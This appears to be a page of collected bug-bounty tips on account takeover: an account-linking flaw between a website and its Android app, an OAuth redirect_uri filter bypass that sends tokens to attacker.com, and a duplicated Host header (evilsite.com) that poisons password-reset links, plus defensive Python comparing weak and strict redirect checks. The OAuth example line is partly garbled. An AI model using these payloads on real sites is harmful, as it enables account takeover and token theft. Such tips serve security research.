Last updated 3 years ago
Account takeover worth $$$$
1. Created an account on the website using a test mail ID
2. Uploaded private documents like a resume and photos
3. The same site has an Android app > created an account using the same mail ID but a different password
4. Boom, account created and able to see the private documents

#bugbounty I was able to bypass the filter on OAuth through FUZZ with URL-encoded chars. Found that the website adds / before %5b when redirecting the token.
Example: target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd
Redirects token to: http://Attacker.com/%5b.target.comrget.com?token=…...

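A defensive illustration of the OAuth tip above, added here and not code from the tweet's author or the affected site: it assumes the bypassed filter was a suffix check on the URL authority (the post does not say what it was) and compares that with exact matching against pre-registered redirect URIs. All host names, constants and sample URIs are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed registration for a hypothetical OAuth client (assumption).
REGISTERED_REDIRECTS = frozenset({"https://login.app.example/oauth/callback"})
TRUSTED_SUFFIX = ".app.example"  # assumed shape of the weak filter

# Hostname made only of letter/digit/hyphen labels: no '%', brackets or '@'.
_HOST_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def weak_filter(uri: str) -> bool:
    """Trusts any authority that merely ends with the expected suffix."""
    return urlsplit(uri).netloc.endswith(TRUSTED_SUFFIX)


def strict_filter(uri: str) -> bool:
    """Exact string match on the registered URI, then authority sanity checks."""
    if uri not in REGISTERED_REDIRECTS:
        return False
    parts = urlsplit(uri)
    # Defence in depth in case a malformed URI was ever registered.
    return (parts.scheme == "https"
            and parts.username is None
            and parts.fragment == ""
            and _HOST_RE.fullmatch(parts.hostname or "") is not None)


def disagreements(candidates):
    """URIs the weak filter accepts but the strict one rejects (review these)."""
    return [u for u in candidates if weak_filter(u) and not strict_filter(u)]


# Constructed inputs modelled on the encoded-character case in the post.
SAMPLES = [
    "https://login.app.example/oauth/callback",   # registered
    "https://other.example%5b.app.example/cb",    # encoded char in authority
    "https://other.example%5B.app.example/cb",    # same, upper-case hex
    "https://other.example/cb",                   # unrelated host
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(f"weak={weak_filter(u)!s:5} strict={strict_filter(u)!s:5} {u}")
```

The two encoded samples pass the suffix check because the raw authority string still ends in the trusted suffix, which is why comparison against the registered value has to be exact rather than pattern-based.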
I was testing for ATO via the reset function. Tried all methods but no success. My friend @Tabnexa gave me a tip to add a double Host in the request while requesting password:
Host: http://site.com
Host: http://evilsite.com
Boom, it worked